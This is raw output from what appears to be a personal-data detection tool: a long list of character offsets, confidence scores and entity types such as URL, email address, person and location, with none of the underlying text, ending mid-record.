start: 4664, end: 4675, score: 0.5, type: URL, start: 4703, end: 4708, score: 0.5, type: URL, start: 4728, end: 4747, score: 0.5, type: URL, start: 4788, end: 4793, score: 0.5, type: URL, start: 4815, end: 4834, score: 0.5, type: URL, start: 4918, end: 4933, score: 0.5, type: URL, start: 5026, end: 5037, score: 0.5, type: URL, start: 5065, end: 5070, score: 0.5, type: URL, start: 5090, end: 5109, score: 0.5, type: URL, start: 5150, end: 5155, score: 0.5, type: URL, start: 5177, end: 5196, score: 0.5, type: URL, start: 5314, end: 5329, score: 0.5, type: URL, start: 5408, end: 5419, score: 0.5, type: URL, start: 5447, end: 5452, score: 0.5, type: URL, start: 5472, end: 5491, score: 0.5, type: URL, start: 5532, end: 5537, score: 0.5, type: URL, start: 5559, end: 5578, score: 0.5, type: URL, start: 5614, end: 5629, score: 0.5, type: URL, start: 5708, end: 5719, score: 0.5, type: URL, start: 5747, end: 5752, score: 0.5, type: URL, start: 5772, end: 5791, score: 0.5, type: URL, start: 5832, end: 5837, score: 0.5, type: URL, start: 5859, end: 5878, score: 0.5, type: URL, start: 5962, end: 5977, score: 0.5, type: URL, start: 6070, end: 6081, score: 0.5, type: URL, start: 6109, end: 6114, score: 0.5, type: URL, start: 6134, end: 6153, score: 0.5, type: URL, start: 6194, end: 6199, score: 0.5, type: URL, start: 6221, end: 6240, score: 0.5, type: URL, start: 6448, end: 6459, score: 0.5, type: URL, start: 6736, end: 6747, score: 0.5, type: URL, start: 7505, end: 7516, score: 0.5, type: URL, start: 7794, end: 7805, score: 0.5, type: EMAIL_ADDRESS, start: 168, end: 183, score: 1.0, type: DATE_TIME, start: 146, end: 150, score: 0.85, type: PERSON, start: 151, end: 167, score: 0.85, type: LOCATION, start: 2742, end: 2747, score: 0.85, type: PERSON, start: 5569, end: 5573, score: 0.85, type: PERSON, start: 5575, end: 5580, score: 0.85, type: URL, start: 807, end: 835, score: 0.6, type: URL, start: 174, end: 183, score: 0.5, type: URL, start: 890, end: 901, score: 0.5, type: URL, start: 927, end: 947, score: 0.5, type: URL, start: 983, end: 993, score: 0.5, type: URL, start: 1257, end: 1264, score: 0.5, type: URL, start: 1325, end: 1332, score: 0.5, type: URL, start: 1373, end: 1380, score: 0.5, type: URL, start: 1512, end: 1519, score: 0.5, type: URL, start: 1624, end: 1631, score: 0.5, type: URL, start: 1737, end: 1744, score: 0.5, type: URL, start: 1782, end: 1789, score: 0.5, type: URL, start: 1884, end: 1891, score: 0.5, type: URL, start: 2187, end: 2194, score: 0.5, type: URL, start: 2208, end: 2217, score: 0.5, type: URL, start: 2456, end: 2471, score: 0.5, type: URL, start: 2662, end: 2669, score: 0.5, type: URL, start: 2680, end: 2689, score: 0.5, type: URL, start: 2711, end: 2721, score: 0.5, type: URL, start: 2866, end: 2881, score: 0.5, type: URL, start: 2896, end: 2903, score: 0.5, type: URL, start: 3111, end: 3121, score: 0.5, type: URL, start: 3311, end: 3318, score: 0.5, type: URL, start: 3343, end: 3350, score: 0.5, type: URL, start: 3376, end: 3387, score: 0.5, type: URL, start: 3411, end: 3418, score: 0.5, type: URL, start: 3453, end: 3463, score: 0.5, type: URL, start: 3718, end: 3725, score: 0.5, type: URL, start: 3767, end: 3774, score: 0.5, type: URL, start: 3796, end: 3803, score: 0.5, type: URL, start: 3829, end: 3836, score: 0.5, type: URL, start: 3862, end: 3873, score: 0.5, type: URL, start: 3908, end: 3915, score: 0.5, type: URL, start: 3937, end: 3944, score: 0.5, type: URL, start: 4015, end: 4022, score: 0.5, type: URL, start: 4346, end: 4353, score: 0.5, type: URL, start: 4364, end: 4373, score: 0.5, type: URL, start: 4388, end: 4398, score: 0.5, type: URL, start: 4421, end: 4431, score: 0.5, type: URL, start: 4475, end: 4485, score: 0.5, type: URL, start: 4497, end: 4504, score: 0.5, type: URL, start: 4616, end: 4623, score: 0.5, type: URL, start: 4643, end: 4653, score: 0.5, type: URL, start: 4665, end: 4672, score: 0.5, type: URL, start: 4781, end: 4787, score: 0.5, type: URL, start: 4981, end: 4996, score: 0.5, type: URL, start: 5134, end: 5140, score: 0.5, type: URL, start: 5346, end: 5352, score: 0.5, type: URL, start: 5602, end: 5608, score: 0.5, type: URL, start: 5641, end: 5650, score: 0.5, type: URL, start: 5661, end: 5670, score: 0.5, type: URL, start: 5704, end: 5714, score: 0.5, type: URL, start: 5979, end: 5985, score: 0.5, type: URL, start: 6077, end: 6084, score: 0.5, type: URL, start: 6095, end: 6104, score: 0.5, type: URL, start: 6119, end: 6129, score: 0.5, type: URL, start: 6157, end: 6167, score: 0.5, type: URL, start: 6198, end: 6208, score: 0.5, type: URL, start: 6241, end: 6251, score: 0.5, type: URL, start: 6263, end: 6270, score: 0.5, type: URL, start: 6367, end: 6374, score: 0.5, type: URL, start: 6397, end: 6412, score: 0.5, type: EMAIL_ADDRESS, start: 693, end: 708, score: 1.0, type: URL, start: 88, end: 140, score: 0.6, type: IP_ADDRESS, start: 985, end: 986, score: 0.6, type: IP_ADDRESS, start: 1013, end: 1017, score: 0.6, type: URL, start: 183, end: 192, score: 0.5, type: URL, start: 699, end: 708, score: 0.5, type: LOCATION, start: 170, end: 196, score: 0.85, type: IP_ADDRESS, start: 1772, end: 1781, score: 0.6, type: URL, start: 170, end: 176, score: 0.5, type: URL, start: 240, end: 246, score: 0.5, type: URL, start: 298, end: 306, score: 0.5, type: URL, start: 378, end: 384, score: 0.5, type: URL, start: 470, end: 478, score: 0.5, type: URL, start: 517, end: 523, score: 0.5, type: URL, start: 594, end: 600, score: 0.5, type: URL, start: 627, end: 633, score: 0.5, type: URL, start: 706, end: 713, score: 0.5, type: URL, start: 787, end: 793, score: 0.5, type: URL, start: 891, end: 902, score: 0.5, type: URL, start: 951, end: 957, score: 0.5, type: URL, start: 1072, end: 1078, score: 0.5, type: URL, start: 1128, end: 1134, score: 0.5, type: URL, start: 1216, end: 1223, score: 0.5, type: URL, start: 1297, end: 1303, score: 0.5, type: URL, start: 1401, end: 1412, score: 0.5, type: URL, start: 1460, end: 1466, score: 0.5, type: URL, start: 1546, end: 1552, score: 0.5, type: URL, start: 1582, end: 1588, score: 0.5, type: URL, start: 1670, end: 1677, score: 0.5, type: URL, start: 1746, end: 1752, score: 0.5, type: PERSON, start: 31, end: 37, score: 0.85, type: NRP, start: 57, end: 64, score: 0.85, type: PERSON, start: 178, end: 182, score: 0.85, type: PERSON, start: 495, end: 504, score: 0.85, type: LOCATION, start: 1165, end: 1174, score: 0.85, type: DATE_TIME, start: 1252, end: 1270, score: 0.85, type: DATE_TIME, start: 1493, end: 1502, score: 0.85, type: DATE_TIME, start: 1528, end: 1530, score: 0.85, type: DATE_TIME, start: 1718, end: 1723, score: 0.85, type: PERSON, start: 2118, end: 2125, score: 0.85, type: DATE_TIME, start: 2165, end: 2169, score: 0.85, type: DATE_TIME, start: 2506, end: 2512, score: 0.85, type: DATE_TIME, start: 2514, end: 2521, score: 0.85, type: LOCATION, start: 2601, end: 2610, score: 0.85, type: DATE_TIME, start: 2785, end: 2790, score: 0.85, type: PERSON, start: 3186, end: 3193, score: 0.85, type: DATE_TIME, start: 3233, end: 3241, score: 0.85, type: PERSON, start: 4019, end: 4028, score: 0.85, type: PERSON, start: 4222, end: 4231, score: 0.85, type: PERSON, start: 4347, end: 4355, score: 0.85, type: DATE_TIME, start: 4961, end: 4965, score: 0.85, type: DATE_TIME, start: 4993, end: 4997, score: 0.85, type: DATE_TIME, start: 5212, end: 5216, score: 0.85, type: DATE_TIME, start: 5231, end: 5235, score: 0.85, type: DATE_TIME, start: 5382, end: 5386, score: 0.85, type: DATE_TIME, start: 5402, end: 5406, score: 0.85, type: LOCATION, start: 5815, end: 5824, score: 0.85, type: LOCATION, start: 5891, end: 5898, score: 0.85, type: LOCATION, start: 6219, end: 6228, score: 0.85, type: LOCATION, start: 6303, end: 6310, score: 0.85, type: LOCATION, start: 6553, end: 6562, score: 0.85, type: LOCATION, start: 6639, end: 6646, score: 0.85, type: LOCATION, start: 7982, end: 7995, score: 0.85, type: LOCATION, start: 8124, end: 8137, score: 0.85, type: LOCATION, start: 8337, end: 8341, score: 0.85, type: URL, start: 228, end: 233, score: 0.5, type: URL, start: 253, end: 258, score: 0.5, type: URL, start: 278, end: 287, score: 0.5, type: URL, start: 322, end: 331, score: 0.5, type: URL, start: 699, end: 704, score: 0.5, type: URL, start: 1747, end: 1754, score: 0.5, type: URL, start: 2225, end: 2235, score: 0.5, type: URL, start: 2326, end: 2336, score: 0.5, type: URL, start: 2489, end: 2494, score: 0.5, type: URL, start: 2537, end: 2549, score: 0.5, type: URL, start: 2814, end: 2821, score: 0.5, type: URL, start: 3284, end: 3294, score: 0.5, type: URL, start: 3437, end: 3442, score: 0.5, type: URL, start: 3459, end: 3464, score: 0.5, type: URL, start: 3489, end: 3500, score: 0.5, type: URL, start: 3824, end: 3830, score: 0.5, type: URL, start: 3847, end: 3853, score: 0.5, type: URL, start: 3881, end: 3889, score: 0.5, type: URL, start: 3901, end: 3907, score: 0.5, type: URL, start: 3951, end: 3956, score: 0.5, type: URL, start: 4097, end: 4110, score: 0.5, type: URL, start: 4165, end: 4174, score: 0.5, type: URL, start: 4347, end: 4352, score: 0.5, type: URL, start: 4527, end: 4539, score: 0.5, type: URL, start: 4549, end: 4555, score: 0.5, type: URL, start: 4583, end: 4589, score: 0.5, type: URL, start: 5617, end: 5627, score: 0.5, type: URL, start: 5705, end: 5712, score: 0.5, type: URL, start: 5716, end: 5726, score: 0.5, type: URL, start: 5974, end: 5984, score: 0.5, type: URL, start: 6052, end: 6062, score: 0.5, type: URL, start: 6108, end: 6115, score: 0.5, type: URL, start: 6119, end: 6129, score: 0.5, type: URL, start: 6343, end: 6353, score: 0.5, type: URL, start: 6442, end: 6449, score: 0.5, type: URL, start: 6453, end: 6463, score: 0.5, type: URL, start: 6702, end: 6707, score: 0.5, type: URL, start: 7112, end: 7117, score: 0.5, type: URL, start: 7526, end: 7531, score: 0.5, type: URL, start: 7612, end: 7622, score: 0.5, type: URL, start: 7691, end: 7696, score: 0.5, type: URL, start: 7727, end: 7732, score: 0.5, type: URL, start: 7916, end: 7926, score: 0.5, type: URL, start: 8055, end: 8065, score: 0.5, type: URL, start: 8172, end: 8178, score: 0.5, type: URL, start: 8217, end: 8223, score: 0.5, type: URL, start: 8535, end: 8542, score: 0.5, type: URL, start: 8546, end: 8556, score: 0.5, type: URL, start: 8641, end: 8648, score: 0.5, type: URL, start: 8652, end: 8662, score: 0.5, type: URL, start: 8736, end: 8741, score: 0.5, type: URL, start: 8824, end: 8829, score: 0.5, type: EMAIL_ADDRESS, start: 32, end: 47, score: 1.0, type: DATE_TIME, start: 16, end: 20, score: 0.85, type: LOCATION, start: 21, end: 31, score: 0.85, type: LOCATION, start: 916, end: 923, score: 0.85, type: PERSON, start: 946, end: 953, score: 0.85, type: PERSON, start: 2252, end: 2267, score: 0.85, type: PERSON, start: 2274, end: 2280, score: 0.85, type: URL, start: 38, end: 47, score: 0.5, type: URL, start: 1460, end: 1467, score: 0.5, type: URL, start: 1501, end: 1508, score: 0.5, type: URL, start: 1756, end: 1760, score: 0.5, type: URL, start: 2103, end: 2108, score: 0.5, type: URL, start: 2252, end: 2263, score: 0.5, type: URL, start: 2344, end: 2355, score: 0.5, type: URL, start: 2407, end: 2418, score: 0.5, type: URL, start: 2441, end: 2451, score: 0.5, type: URL, start: 2480, end: 2491, score: 0.5, type: URL, start: 2543, end: 2548, score: 0.5, type: EMAIL_ADDRESS, start: 119, end: 134, score: 1.0, type: DATE_TIME, start: 101, end: 105, score: 0.85, type: PERSON, start: 106, end: 118, score: 0.85, type: LOCATION, start: 2390, end: 2422, score: 0.85, type: PERSON, start: 3074, end: 3083, score: 0.85, type: LOCATION, start: 3478, end: 3493, score: 0.85, type: NRP, start: 3734, end: 3758, score: 0.85, type: PERSON, start: 3806, end: 3833, score: 0.85, type: NRP, start: 3879, end: 3888, score: 0.85, type: LOCATION, start: 4015, end: 4030, score: 0.85, type: NRP, start: 4258, end: 4282, score: 0.85, type: PERSON, start: 4328, end: 4353, score: 0.85, type: PERSON, start: 5357, end: 5383, score: 0.85, type: PERSON, start: 5561, end: 5575, score: 0.85, type: PERSON, start: 6479, end: 6514, score: 0.85, type: PERSON, start: 7800, end: 7835, score: 0.85, type: LOCATION, start: 8190, end: 8195, score: 0.85, type: PERSON, start: 8573, end: 8614, score: 0.85, type: URL, start: 726, end: 754, score: 0.6, type: URL, start: 125, end: 134, score: 0.5, type: URL, start: 818, end: 828, score: 0.5, type: URL, start: 952, end: 960, score: 0.5, type: URL, start: 1000, end: 1008, score: 0.5, type: URL, start: 1110, end: 1118, score: 0.5, type: URL, start: 1240, end: 1250, score: 0.5, type: URL, start: 1652, end: 1661, score: 0.5, type: URL, start: 1839, end: 1845, score: 0.5, type: URL, start: 1854, end: 1861, score: 0.5, type: URL, start: 1924, end: 1931, score: 0.5, type: URL, start: 1940, end: 1946, score: 0.5, type: URL, start: 2265, end: 2276, score: 0.5, type: URL, start: 2500, end: 2509, score: 0.5, type: URL, start: 2695, end: 2702, score: 0.5, type: URL, start: 2763, end: 2770, score: 0.5, type: URL, start: 3036, end: 3044, score: 0.5, type: URL, start: 3047, end: 3060, score: 0.5, type: URL, start: 3177, end: 3192, score: 0.5, type: URL, start: 3651, end: 3661, score: 0.5, type: URL, start: 3734, end: 3745, score: 0.5, type: URL, start: 3992, end: 3999, score: 0.5, type: URL, start: 4181, end: 4189, score: 0.5, type: URL, start: 4258, end: 4269, score: 0.5, type: URL, start: 4511, end: 4520, score: 0.5, type: URL, start: 4702, end: 4709, score: 0.5, type: URL, start: 4758, end: 4781, score: 0.5, type: URL, start: 4937, end: 4946, score: 0.5, type: URL, start: 4975, end: 4983, score: 0.5, type: URL, start: 5017, end: 5028, score: 0.5, type: URL, start: 5205, end: 5224, score: 0.5, type: URL, start: 5313, end: 5319, score: 0.5, type: URL, start: 5357, end: 5376, score: 0.5, type: URL, start: 5492, end: 5499, score: 0.5, type: URL, start: 5518, end: 5533, score: 0.5, type: URL, start: 5561, end: 5568, score: 0.5, type: URL, start: 5587, end: 5593, score: 0.5, type: URL, start: 5671, end: 5679, score: 0.5, type: URL, start: 5682, end: 5695, score: 0.5, type: URL, start: 5710, end: 5718, score: 0.5, type: URL, start: 5868, end: 5876, score: 0.5, type: URL, start: 5937, end: 5945, score: 0.5, type: URL, start: 6001, end: 6007, score: 0.5, type: URL, start: 6074, end: 6079, score: 0.5, type: URL, start: 6177, end: 6194, score: 0.5, type: URL, start: 6257, end: 6265, score: 0.5, type: URL, start: 6268, end: 6281, score: 0.5, type: URL, start: 6372, end: 6389, score: 0.5, type: URL, start: 6425, end: 6431, score: 0.5, type: URL, start: 6687, end: 6704, score: 0.5, type: URL, start: 6731, end: 6737, score: 0.5, type: URL, start: 6781, end: 6797, score: 0.5, type: URL, start: 6840, end: 6846, score: 0.5, type: URL, start: 6881, end: 6897, score: 0.5, type: URL, start: 6923, end: 6939, score: 0.5, type: URL, start: 6942, end: 6959, score: 0.5, type: URL, start: 7062, end: 7069, score: 0.5, type: URL, start: 7134, end: 7159, score: 0.5, type: URL, start: 7174, end: 7197, score: 0.5, type: URL, start: 7375, end: 7388, score: 0.5, type: URL, start: 7540, end: 7548, score: 0.5, type: URL, start: 7705, end: 7711, score: 0.5, type: URL, start: 7800, end: 7808, score: 0.5, type: URL, start: 7811, end: 7824, score: 0.5, type: URL, start: 8160, end: 8165, score: 0.5, type: URL, start: 8190, end: 8198, score: 0.5, type: URL, start: 8219, end: 8224, score: 0.5, type: URL, start: 8269, end: 8281, score: 0.5, type: URL, start: 8315, end: 8329, score: 0.5, type: URL, start: 8364, end: 8379, score: 0.5, type: URL, start: 8407, end: 8419, score: 0.5, type: URL, start: 8459, end: 8480, score: 0.5, type: URL, start: 8507, end: 8515, score: 0.5, type: URL, start: 8573, end: 8592, score: 0.5, type: EMAIL_ADDRESS, start: 171, end: 186, score: 1.0, type: PERSON, start: 159, end: 186, score: 0.85, type: LOCATION, start: 698, end: 706, score: 0.85, type: PERSON, start: 1509, end: 1517, score: 0.85, type: PERSON, start: 1653, end: 1659, score: 0.85, type: PERSON, start: 2046, end: 2057, score: 0.85, type: LOCATION, start: 2530, end: 2565, score: 0.85, type: PERSON, start: 2777, end: 2805, score: 0.85, type: PERSON, start: 3382, end: 3386, score: 0.85, type: URL, start: 59, end: 70, score: 0.5, type: URL, start: 177, end: 186, score: 0.5, type: URL, start: 205, end: 216, score: 0.5, type: URL, start: 369, end: 375, score: 0.5, type: URL, start: 698, end: 704, score: 0.5, type: URL, start: 716, end: 727, score: 0.5, type: URL, start: 749, end: 755, score: 0.5, type: URL, start: 771, end: 777, score: 0.5, type: URL, start: 791, end: 797, score: 0.5, type: URL, start: 843, end: 849, score: 0.5, type: URL, start: 862, end: 868, score: 0.5, type: URL, start: 884, end: 895, score: 0.5, type: URL, start: 928, end: 938, score: 0.5, type: URL, start: 991, end: 1001, score: 0.5, type: URL, start: 1857, end: 1865, score: 0.5, type: URL, start: 2337, end: 2348, score: 0.5, type: URL, start: 2568, end: 2579, score: 0.5, type: URL, start: 2922, end: 2929, score: 0.5, type: URL, start: 3134, end: 3141, score: 0.5, type: URL, start: 3191, end: 3198, score: 0.5, type: URL, start: 3324, end: 3334, score: 0.5, type: URL, start: 3411, end: 3425, score: 0.5, type: URL, start: 3471, end: 3475, score: 0.5, type: URL, start: 3485, end: 3492, score: 0.5, type: URL, start: 3593, end: 3602, score: 0.5, type: URL, start: 3721, end: 3728, score: 0.5, type: URL, start: 3891, end: 3899, score: 0.5, type: URL, start: 3961, end: 3967, score: 0.5, type: URL, start: 4020, end: 4027, score: 0.5, type: URL, start: 4090, end: 4100, score: 0.5, type: URL, start: 4237, end: 4244, score: 0.5, type: URL, start: 4349, end: 4359, score: 0.5, type: URL, start: 4436, end: 4446, score: 0.5, type: URL, start: 4460, end: 4464, score: 0.5, type: URL, start: 4489, end: 4493, score: 0.5, type: URL, start: 4528, end: 4538, score: 0.5, type: URL, start: 4576, end: 4586, score: 0.5, type: URL, start: 4646, end: 4650, score: 0.5, type: LOCATION, start: 516, end: 525, score: 0.85, type: LOCATION, start: 694, end: 698, score: 0.85, type: DATE_TIME, start: 1763, end: 1773, score: 0.85, type: LOCATION, start: 2717, end: 2731, score: 0.85, type: PERSON, start: 5462, end: 5481, score: 0.85, type: PERSON, start: 5531, end: 5546, score: 0.85, type: LOCATION, start: 5555, end: 5571, score: 0.85, type: NRP, start: 5642, end: 5658, score: 0.85, type: PERSON, start: 6871, end: 6877, score: 0.85, type: LOCATION, start: 7297, end: 7303, score: 0.85, type: LOCATION, start: 7305, end: 7311, score: 0.85, type: IP_ADDRESS, start: 1164, end: 1169, score: 0.6, type: URL, start: 192, end: 203, score: 0.5, type: URL, start: 280, end: 286, score: 0.5, type: URL, start: 324, end: 329, score: 0.5, type: URL, start: 354, end: 360, score: 0.5, type: URL, start: 376, end: 382, score: 0.5, type: URL, start: 481, end: 487, score: 0.5, type: URL, start: 502, end: 508, score: 0.5, type: URL, start: 537, end: 543, score: 0.5, type: URL, start: 1023, end: 1041, score: 0.5, type: URL, start: 1101, end: 1108, score: 0.5, type: URL, start: 1206, end: 1211, score: 0.5, type: URL, start: 1302, end: 1307, score: 0.5, type: URL, start: 1471, end: 1489, score: 0.5, type: URL, start: 1549, end: 1556, score: 0.5, type: URL, start: 1618, end: 1622, score: 0.5, type: URL, start: 1665, end: 1669, score: 0.5, type: URL, start: 1714, end: 1718, score: 0.5, type: URL, start: 1851, end: 1855, score: 0.5, type: URL, start: 1904, end: 1908, score: 0.5, type: URL, start: 1951, end: 1955, score: 0.5, type: URL, start: 1999, end: 2003, score: 0.5, type: URL, start: 2045, end: 2049, score: 0.5, type: URL, start: 2137, end: 2141, score: 0.5, type: URL, start: 2180, end: 2184, score: 0.5, type: URL, start: 2230, end: 2234, score: 0.5, type: URL, start: 2321, end: 2325, score: 0.5, type: URL, start: 2371, end: 2375, score: 0.5, type: URL, start: 2422, end: 2426, score: 0.5, type: URL, start: 2514, end: 2518, score: 0.5, type: URL, start: 2564, end: 2568, score: 0.5, type: URL, start: 2717, end: 2721, score: 0.5, type: URL, start: 2766, end: 2770, score: 0.5, type: URL, start: 2815, end: 2819, score: 0.5, type: URL, start: 2914, end: 2918, score: 0.5, type: URL, start: 3011, end: 3015, score: 0.5, type: URL, start: 3223, end: 3228, score: 0.5, type: URL, start: 3342, end: 3352, score: 0.5, type: URL, start: 3431, end: 3449, score: 0.5, type: URL, start: 3510, end: 3517, score: 0.5, type: URL, start: 3578, end: 3584, score: 0.5, type: URL, start: 3641, end: 3647, score: 0.5, type: URL, start: 3664, end: 3670, score: 0.5, type: URL, start: 3726, end: 3732, score: 0.5, type: URL, start: 3751, end: 3757, score: 0.5, type: URL, start: 3813, end: 3819, score: 0.5, type: URL, start: 4001, end: 4007, score: 0.5, type: URL, start: 4063, end: 4069, score: 0.5, type: URL, start: 4092, end: 4098, score: 0.5, type: URL, start: 4154, end: 4160, score: 0.5, type: URL, start: 4177, end: 4183, score: 0.5, type: URL, start: 4238, end: 4244, score: 0.5, type: URL, start: 4262, end: 4268, score: 0.5, type: URL, start: 4324, end: 4330, score: 0.5, type: URL, start: 4346, end: 4352, score: 0.5, type: URL, start: 4406, end: 4412, score: 0.5, type: URL, start: 4513, end: 4519, score: 0.5, type: URL, start: 4573, end: 4579, score: 0.5, type: URL, start: 4592, end: 4598, score: 0.5, type: URL, start: 4658, end: 4664, score: 0.5, type: URL, start: 4684, end: 4690, score: 0.5, type: URL, start: 4744, end: 4750, score: 0.5, type: URL, start: 4850, end: 4856, score: 0.5, type: URL, start: 4912, end: 4918, score: 0.5, type: URL, start: 4938, end: 4944, score: 0.5, type: URL, start: 5001, end: 5007, score: 0.5, type: URL, start: 5028, end: 5034, score: 0.5, type: URL, start: 5090, end: 5096, score: 0.5, type: URL, start: 5196, end: 5202, score: 0.5, type: URL, start: 5257, end: 5263, score: 0.5, type: URL, start: 5283, end: 5289, score: 0.5, type: URL, start: 5347, end: 5353, score: 0.5, type: URL, start: 5555, end: 5561, score: 0.5, type: URL, start: 5617, end: 5623, score: 0.5, type: URL, start: 5642, end: 5648, score: 0.5, type: URL, start: 5706, end: 5712, score: 0.5, type: URL, start: 5731, end: 5737, score: 0.5, type: URL, start: 5795, end: 5801, score: 0.5, type: URL, start: 5910, end: 5916, score: 0.5, type: URL, start: 5972, end: 5978, score: 0.5, type: URL, start: 6083, end: 6089, score: 0.5, type: URL, start: 6145, end: 6151, score: 0.5, type: URL, start: 6422, end: 6428, score: 0.5, type: URL, start: 6448, end: 6454, score: 0.5, type: URL, start: 6472, end: 6478, score: 0.5, type: URL, start: 6498, end: 6504, score: 0.5, type: URL, start: 6517, end: 6523, score: 0.5, type: URL, start: 6551, end: 6556, score: 0.5, type: URL, start: 6766, end: 6776, score: 0.5, type: URL, start: 6806, end: 6816, score: 0.5, type: URL, start: 6855, end: 6865, score: 0.5, type: URL, start: 6904, end: 6914, score: 0.5, type: URL, start: 6944, end: 6960, score: 0.5, type: URL, start: 7099, end: 7110, score: 0.5, type: URL, start: 7230, end: 7235, score: 0.5, type: URL, start: 7255, end: 7260, score: 0.5, type: URL, start: 7319, end: 7324, score: 0.5, type: URL, start: 7458, end: 7463, score: 0.5, type: URL, start: 7565, end: 7570, score: 0.5, type: EMAIL_ADDRESS, start: 254, end: 269, score: 1.0, type: DATE_TIME, start: 36, end: 40, score: 0.85, type: PERSON, start: 242, end: 252, score: 0.85, type: PERSON, start: 424, end: 433, score: 0.85, type: PERSON, start: 753, end: 757, score: 0.85, type: PERSON, start: 3366, end: 3406, score: 0.85, type: PERSON, start: 3432, end: 3450, score: 0.85, type: PERSON, start: 3457, end: 3464, score: 0.85, type: PERSON, start: 3666, end: 3695, score: 0.85, type: PERSON, start: 5612, end: 5620, score: 0.85, type: LOCATION, start: 6678, end: 6683, score: 0.85, type: DATE_TIME, start: 7090, end: 7099, score: 0.85, type: URL, start: 260, end: 269, score: 0.5, type: URL, start: 1948, end: 1955, score: 0.5, type: URL, start: 2220, end: 2227, score: 0.5, type: URL, start: 3107, end: 3120, score: 0.5, type: URL, start: 3341, end: 3353, score: 0.5, type: URL, start: 3440, end: 3445, score: 0.5, type: URL, start: 4086, end: 4093, score: 0.5, type: URL, start: 4228, end: 4248, score: 0.5, type: URL, start: 4622, end: 4631, score: 0.5, type: URL, start: 4636, end: 4642, score: 0.5, type: URL, start: 4696, end: 4705, score: 0.5, type: URL, start: 4731, end: 4742, score: 0.5, type: URL, start: 5338, end: 5349, score: 0.5, type: URL, start: 5468, end: 5473, score: 0.5, type: URL, start: 5573, end: 5577, score: 0.5, type: URL, start: 5595, end: 5599, score: 0.5, type: URL, start: 5649, end: 5654, score: 0.5, type: URL, start: 5718, end: 5730, score: 0.5, type: URL, start: 5821, end: 5832, score: 0.5, type: URL, start: 6403, end: 6415, score: 0.5, type: URL, start: 6479, end: 6483, score: 0.5, type: URL, start: 6505, end: 6509, score: 0.5, type: URL, start: 6809, end: 6821, score: 0.5, type: URL, start: 6847, end: 6854, score: 0.5, type: URL, start: 6901, end: 6908, score: 0.5, type: URL, start: 7069, end: 7076, score: 0.5, type: URL, start: 7351, end: 7363, score: 0.5, type: URL, start: 7413, end: 7417, score: 0.5, type: URL, start: 7450, end: 7454, score: 0.5, type: URL, start: 7784, end: 7791, score: 0.5, type: URL, start: 7813, end: 7825, score: 0.5, type: URL, start: 7841, end: 7848, score: 0.5, type: DATE_TIME, start: 34, end: 38, score: 0.85, type: PERSON, start: 686, end: 704, score: 0.85, type: DATE_TIME, start: 2513, end: 2540, score: 0.85, type: DATE_TIME, start: 2540, end: 2552, score: 0.85, type: PERSON, start: 4859, end: 4915, score: 0.85, type: URL, start: 4904, end: 4911, score: 0.85, type: LOCATION, start: 8315, end: 8328, score: 0.85, type: LOCATION, start: 9160, end: 9173, score: 0.85, type: PERSON, start: 9776, end: 9831, score: 0.85, type: LOCATION, start: 10113, end: 10168, score: 0.85, type: URL, start: 106, end: 146, score: 0.6, type: URL, start: 3970, end: 3991, score: 0.6, type: URL, start: 2084, end: 2098, score: 0.5, type: URL, start: 4016, end: 4026, score: 0.5, type: URL, start: 4031, end: 4039, score: 0.5, type: URL, start: 4077, end: 4087, score: 0.5, type: URL, start: 4092, end: 4100, score: 0.5, type: URL, start: 4144, end: 4154, score: 0.5, type: URL, start: 4159, end: 4167, score: 0.5, type: URL, start: 4206, end: 4216, score: 0.5, type: URL, start: 4221, end: 4229, score: 0.5, type: URL, start: 4268, end: 4278, score: 0.5, type: URL, start: 4283, end: 4295, score: 0.5, type: URL, start: 4327, end: 4337, score: 0.5, type: URL, start: 4342, end: 4354, score: 0.5, type: URL, start: 4732, end: 4739, score: 0.5, type: URL, start: 4761, end: 4768, score: 0.5, type: URL, start: 4937, end: 4944, score: 0.5, type: URL, start: 4962, end: 4969, score: 0.5, type: URL, start: 5182, end: 5189, score: 0.5, type: URL, start: 5296, end: 5310, score: 0.5, type: URL, start: 5637, end: 5644, score: 0.5, type: URL, start: 5907, end: 5911, score: 0.5, type: URL, start: 5956, end: 5963, score: 0.5, type: URL, start: 6216, end: 6223, score: 0.5, type: URL, start: 6486, end: 6500, score: 0.5, type: URL, start: 6562, end: 6574, score: 0.5, type: URL, start: 6808, end: 6815, score: 0.5, type: URL, start: 7048, end: 7062, score: 0.5, type: URL, start: 7165, end: 7180, score: 0.5, type: URL, start: 7300, end: 7307, score: 0.5, type: URL, start: 7784, end: 7791, score: 0.5, type: URL, start: 8033, end: 8040, score: 0.5, type: URL, start: 8203, end: 8209, score: 0.5, type: URL, start: 8348, end: 8355, score: 0.5, type: URL, start: 8870, end: 8890, score: 0.5, type: URL, start: 8972, end: 8979, score: 0.5, type: URL, start: 9193, end: 9200, score: 0.5, type: URL, start: 9795, end: 9811, score: 0.5, type: URL, start: 9855, end: 9871, score: 0.5, type: URL, start: 9904, end: 9920, score: 0.5, type: URL, start: 9950, end: 9966, score: 0.5, type: URL, start: 10035, end: 10041, score: 0.5, type: URL, start: 10124, end: 10130, score: 0.5, type: URL, start: 10301, end: 10307, score: 0.5, type: EMAIL_ADDRESS, start: 101, end: 116, score: 1.0, type: EMAIL_ADDRESS, start: 161, end: 176, score: 1.0, type: DATE_TIME, start: 65, end: 69, score: 0.85, type: PERSON, start: 70, end: 99, score: 0.85, type: PERSON, start: 145, end: 159, score: 0.85, type: PERSON, start: 849, end: 860, score: 0.85, type: LOCATION, start: 875, end: 881, score: 0.85, type: LOCATION, start: 899, end: 902, score: 0.85, type: PERSON, start: 1849, end: 1855, score: 0.85, type: PERSON, start: 2359, end: 2370, score: 0.85, type: PERSON, start: 2452, end: 2460, score: 0.85, type: PERSON, start: 2465, end: 2471, score: 0.85, type: LOCATION, start: 3115, end: 3129, score: 0.85, type: URL, start: 911, end: 960, score: 0.6, type: IP_ADDRESS, start: 2112, end: 2126, score: 0.6, type: IP_ADDRESS, start: 2213, end: 2230, score: 0.6, type: URL, start: 107, end: 116, score: 0.5, type: URL, start: 167, end: 176, score: 0.5, type: EMAIL_ADDRESS, start: 2284, end: 2299, score: 1.0, type: EMAIL_ADDRESS, start: 4126, end: 4141, score: 1.0, type: EMAIL_ADDRESS, start: 8206, end: 8221, score: 1.0, type: EMAIL_ADDRESS, start: 20061, end: 20076, score: 1.0, type: EMAIL_ADDRESS, start: 23476, end: 23491, score: 1.0, type: EMAIL_ADDRESS, start: 24859, end: 24874, score: 1.0, type: EMAIL_ADDRESS, start: 25218, end: 25233, score: 1.0, type: EMAIL_ADDRESS, start: 25902, end: 25917, score: 1.0, type: EMAIL_ADDRESS, start: 